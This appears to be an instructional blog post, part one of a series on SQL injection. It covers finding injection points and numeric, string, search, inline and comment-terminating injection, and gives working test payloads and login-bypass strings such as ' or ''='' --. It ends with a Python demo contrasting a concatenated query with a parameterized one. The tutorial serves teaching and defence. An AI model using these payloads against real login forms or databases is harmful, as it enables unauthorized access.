Explanation and utilization of various types of SQL injection (1)

Introduction:

Causes of SQL injection vulnerabilities

SQL injection
SQL injection arises when a program does not validate user-supplied data before using it in a database operation: the attacker's input becomes part of the SQL statement the application executes, and the application is left with a security risk.

SQL statements

Structured Query Language
Structured Query Language (SQL) is the standard language for communicating with relational databases.
Query:         SELECT fields FROM table WHERE condition
Delete record: DELETE FROM table WHERE condition
Update record: UPDATE table SET field=value WHERE condition
Add record:    INSERT INTO table (fields) VALUES (values)

SQL injection attack process

  1. Determine the injection point

  2. Determine the injection point type

  3. Determine database type

  4. Extract database data, escalate privileges

1. Determine the SQL injection point

Finding the injection point is the most critical and basic step.

The essential principle is:
Find a point where input is processed by the backend and
submitted to the database.
Any input that reaches the database may trigger SQL injection.
There are generally three categories:

GET parameters trigger SQL injection
POST parameters trigger SQL injection
Cookies trigger SQL injection

E.g.:
In the parameters of an ordinary link (link?parameter), look for forms such as ?id=num, and also at search boxes.

There are many ways to verify whether an injection point exists. The
most conventional and simplest method is to introduce a single quote and compare the responses.

http://host/test.php?id=100'  returns an error, indicating the possibility of injection

http://host/test.php?id=100 and 1=1  returns the normal page

http://host/test.php?id=100 and 1=2  returns a different page (an error, or no result)

If all three of the above hold, the chance that this is an injection point is very high. (In a real request, URL-encode the payload: spaces as %20 or +, and the quote as %27 if the client does not do so for you.)

After finding the injection point, the next step is:

2. Determine the injection type

0x01 Numeric injection point

Testing method:

http://host/test.php?id=100 and 1=1  returns success

http://host/test.php?id=100 and 1=2  returns failure

Why does the first one return success and the second one fail?

The reasons are as follows:

Suppose the SQL query statement of the website is:
SELECT * FROM news WHERE id=$id
Here $id is the value submitted by the user, inserted without quotes.

When we enter
100 and 1=1
the statement becomes
SELECT * FROM news WHERE id=100 and 1=1

The left side of the AND returns success because the id we appended our injection to exists. If that id does not exist, this test cannot work; pick an id that returns a record.

The right side of the AND, 1=1, is always true, so the whole statement returns success.

If it is changed to 1=2, that condition is false, and AND returns false as soon as either operand is false, so the 1=2 version returns failure.

0x02 Character injection point
Test method:

http://host/test.php?name=man' and '1'='1  returns success

http://host/test.php?name=man' and '1'='2  returns failure

This is the numeric case above turned into a string case.

The reasons are as follows:

Suppose the SQL statement of the website is:
SELECT * FROM news WHERE name='$name'
When we construct the input
man' and '1'='1
the statement becomes
SELECT * FROM news WHERE name='man' and '1'='1'

Notice that the quotes are balanced: our leading quote closes the original string, and the original trailing quote closes our final '1.

As before, the left side of the AND is true (a record named man exists) and the right side is true, so the whole statement returns success.
Likewise, ending with '1'='2 returns failure. The values do not have to be 1 or 2; since this is a string comparison, any characters work,

like this:

http://host/test.php?name=man' and 'a'='a  returns success
http://host/test.php?name=man' and 'a'='b  returns failure



0x03 Search injection point, currently common

Testing method:

http://host/test.php?keyword=python%' and 1=1 and '%'='

http://host/test.php?keyword=python%' and 1=2 and '%'='

Suppose the SQL query statement is:

SELECT * FROM news WHERE keyword like '%$keyword%'

Here $keyword is the user input.

When we enter
python%' and 1=1 and '%'='
we end up with
SELECT * FROM news WHERE keyword like '%python%' and 1=1 and '%'='%'
which is again balanced: our leading %' closes the original LIKE pattern, and the original trailing %' completes the final '%'='%' comparison. (In a real URL, send % as %25 and spaces as %20 or + so the web server does not mangle the payload.)

Because the conditions are joined by AND, a single false condition makes the whole WHERE clause false.

We can split the statement into three parts:

SELECT * FROM news WHERE keyword like '%python%'

and 1=1

and '%'='%'

The first part succeeds as long as some record matches the search term (again, we are building the injection on top of a query that already returns results).

The second and third parts are also true, since any value equals itself.

If we replace the second part with 1=2, it is false and the whole statement returns failure. That is the principle.


0x04 Inline SQL injection, commonly used

Inline injection means that after the SQL code is injected, the original query is still executed in full; nothing is commented out.

Suppose the website's SQL query statement is:

SELECT * FROM admin WHERE username='$name' AND password ='$passwd'

This looks like the code behind a login page.

We construct the following string and submit it either in the username box

' or ''='

or in the password box. The two submission positions behave differently. Let's analyze them.

Submitted as the username, the statement becomes

SELECT * FROM admin WHERE username='' or ''='' AND password ='fuzz'

where fuzz is whatever we typed in the other field.

Submitted as the password, it becomes

SELECT * FROM admin WHERE username='fuzz' AND password ='' or ''=''

Note:
In SQL, AND has higher precedence than OR: AND is evaluated first, then OR. So the OR splits each statement into two parts.

For the username case:

SELECT * FROM admin WHERE username=''

or

''='' AND password ='fuzz'

For the password case:

SELECT * FROM admin WHERE username='fuzz' AND password =''

or

''=''

Analyzing the username case first, with AND evaluated before OR:

SELECT * FROM admin WHERE username=''  returns failure

or

''='' AND password ='fuzz'  returns failure

No account has an empty username, so the first part is false; and because the password was typed at random, it almost certainly matches no account, so after the AND the second part is also false. The whole statement therefore returns failure.

The password case is different:

SELECT * FROM admin WHERE username='fuzz' AND password =''  returns failure

or

''=''  returns success

The first part is false, but the second part, ''='', is true, and OR returns success if either side is true, so the whole statement returns success.

Once the query returns a row, we bypass the login form and are logged straight into the system.



0x05 Terminating SQL injection, commonly used

Terminating injection means the attacker ends the statement early by turning the rest of the original query into a comment.

The commented-out part of the query is not executed. Take the example above:

We saw that filling the username box with

' or ''='

does not make the program return success. So there is no way to attack through the username field?

Wrong, we still have the terminator.

Take the SQL query above again:

SELECT * FROM admin WHERE username='$name' AND password ='$passwd'

and construct the following username input:

' or ''='' --

We then get the following query:

SELECT * FROM admin WHERE username='' or ''='' --' AND password ='fuzz'

Here fuzz is whatever we typed as the password, and -- starts a comment.

The statement now splits into three parts:

SELECT * FROM admin WHERE username=''

or ''=''  returns success

--' AND password ='fuzz'

The first part returns failure, but the second part returns success, and the third part has been commented out and is never executed. So we can still bypass the login through the username field with this trick.

The following are some common termination methods:

Terminating strings:

-- , #, %23, %00, /*

(In MySQL, -- only starts a comment when followed by whitespace, and # is MySQL-specific; %23 is the URL-encoded form of #. %00 is a URL-encoded null byte, which truncates the string in some application languages rather than acting as an SQL comment. /* opens a block comment, and whether the database accepts it unclosed depends on the product and version.)

Termination methods (pick the one that closes the quotes and parentheses of the original query):

-- , '-- , ')-- , ) -- , ')) --, ))--
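The inline (0x04) and terminating (0x05) payloads above can be compared side by side with an added example, not code from the original post: the text's login query built by string concatenation and run against an in-memory SQLite admin table, next to the same check written with bound parameters. The admin table, its single admin/s3cret row, and the function names are constructed for this demo; SQLite is used because it honours both the AND-before-OR precedence and the -- comment that the analysis relies on.

```python
import sqlite3

# Constructed demo data: one account in the admin table the text queries.
conn = sqlite3.connect(":memory:")
conn.executescript("""
CREATE TABLE admin (username TEXT, password TEXT);
INSERT INTO admin VALUES ('admin', 's3cret');
""")


def build_login_sql(name, passwd):
    """The vulnerable query exactly as the text writes it, with $name and
    $passwd pasted into the string (note the space before the second '=')."""
    return ("SELECT * FROM admin WHERE username='" + name +
            "' AND password ='" + passwd + "'")


def vulnerable_login(name, passwd):
    """True when the concatenated query returns at least one row."""
    try:
        return len(conn.execute(build_login_sql(name, passwd)).fetchall()) > 0
    except sqlite3.Error:
        return False  # a syntax error is a failed login, not a bypass


def safe_login(name, passwd):
    """Hardened form: bound parameters, so input is data and never SQL."""
    rows = conn.execute(
        "SELECT * FROM admin WHERE username=? AND password=?",
        (name, passwd),
    ).fetchall()
    return len(rows) > 0


INLINE = "' or ''='"          # 0x04 payload: original query still runs in full
TERMINATED = "' or ''='' --"  # 0x05 payload: trailing space keeps -- a comment


def bypass_matrix(login):
    """Run the three attempts discussed in 0x04 and 0x05 against a login
    function and return which of them succeed."""
    return {
        "inline_in_username": login(INLINE, "fuzz"),      # AND binds first: fails
        "inline_in_password": login("fuzz", INLINE),      # OR ''='' at the end: succeeds
        "terminated_in_username": login(TERMINATED, "fuzz"),  # rest commented out: succeeds
    }


if __name__ == "__main__":
    print("query:", build_login_sql(INLINE, "fuzz"))
    print("vulnerable:", bypass_matrix(vulnerable_login))
    print("safe:", bypass_matrix(safe_login))
```

The printed query for the inline-in-username case makes the precedence argument concrete: `username='' or ''='' AND password ='fuzz'` is parsed as `username='' OR (''='' AND password='fuzz')`, which is why only the password-field and terminated variants log in. Against `safe_login` every attempt fails, including the legitimate-looking terminated one, because the driver never lets the quote or the comment marker reach the parser.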

